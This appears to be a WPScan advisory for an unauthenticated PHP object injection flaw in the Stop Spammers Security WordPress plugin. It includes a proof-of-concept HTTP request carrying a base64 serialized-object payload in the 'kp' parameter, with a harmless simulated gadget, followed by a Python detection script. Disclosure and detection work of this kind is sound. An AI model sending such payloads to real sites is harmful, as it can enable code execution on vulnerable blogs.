wpvulndb | Seryeon Ham | WPVDB-ID:E8BB79DB-EF77-43BE-B449-4C4B5310EEDF | Dec 05, 2022 - 12:00 a.m.

Stop Spammers Security < 2022.6 - Unauthenticated PHP Object Injection

wpscan.com
plugin vulnerability
php object injection
base64 encoding
unauthenticated request
gadget chain
captcha

EPSS: 0.003 (Low), percentile 65.4%

The plugin passes base64-encoded user input to the PHP unserialize() function when a CAPTCHA is used as the second challenge, which could lead to PHP Object Injection if a plugin installed on the blog has a suitable gadget chain.

PoC

To simulate a gadget chain, put the following code in a plugin:

    class Evil {
        public function __wakeup() : void {
            die("Arbitrary deserialization");
        }
    }

On a page where the request is blocked and the second challenge is set to a CAPTCHA (such as reCAPTCHA), send dummy data, intercept it and change the kp parameter with the following payload: Tzo0OiJFdmlsIjowOnt9Ow== (which is the base64 of O:4:"Evil":0:{};)

    POST /wp-login.php HTTP/1.1
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-GB,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 176
    Connection: close
    Upgrade-Insecure-Requests: 1

    kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=
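For detection, the check below flags form bodies whose kp value base64-decodes to a PHP serialized object, which is the pattern the PoC above relies on. It is an added example, not code from the advisory or the plugin; the function names are hypothetical, and it assumes the value is decoded leniently, as PHP's non-strict base64_decode() does.

```python
import base64
import re
from urllib.parse import parse_qs

# Form body of the PoC request shown above, used here as sample input.
POC_BODY = ("kn=6dc52e6b54&ss_block=G&kp=Tzo0OiJFdmlsIjowOnt9Ow%3D%3D"
            "&kr=Allow+List+Email%3A+block%40email.com&ka=block%40email.com"
            "&ke=cwenf&km=cc&recaptcha=recaptcha&g-recaptcha-response=")

# O:<len>:"Class":<n>: (object) or C:<len>:"Class":<n>: (Serializable), at the
# start of the value or nested after ';' or '{'. A string property that merely
# contains such text also matches, which is acceptable for an alerting rule.
PHP_OBJECT_RE = re.compile(rb'(?:^|[;{])[OC]:\+?\d+:"([^"]+)":\d+:')


def lenient_b64decode(value):
    """Decode like PHP's non-strict base64_decode(): drop characters outside
    the alphabet (spaces, newlines, padding) first. Returns None on failure."""
    clean = re.sub(r"[^A-Za-z0-9+/]", "", value)
    try:
        return base64.b64decode(clean + "=" * (-len(clean) % 4))
    except ValueError:
        return None


def serialized_classes(form_body, params=("kp",)):
    """Return {param: [class names]} for each watched parameter whose value
    base64-decodes to data containing a PHP serialized object."""
    findings = {}
    fields = parse_qs(form_body, keep_blank_values=True)
    for name in params:
        for value in fields.get(name, []):
            raw = lenient_b64decode(value)
            if not raw:
                continue
            classes = [c.decode("latin-1") for c in PHP_OBJECT_RE.findall(raw)]
            if classes:
                findings.setdefault(name, []).extend(classes)
    return findings


if __name__ == "__main__":
    print(serialized_classes(POC_BODY))
```

The lenient decoding matters because a value with whitespace inserted into the base64 would slip past a strict decoder while still decoding on the PHP side.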
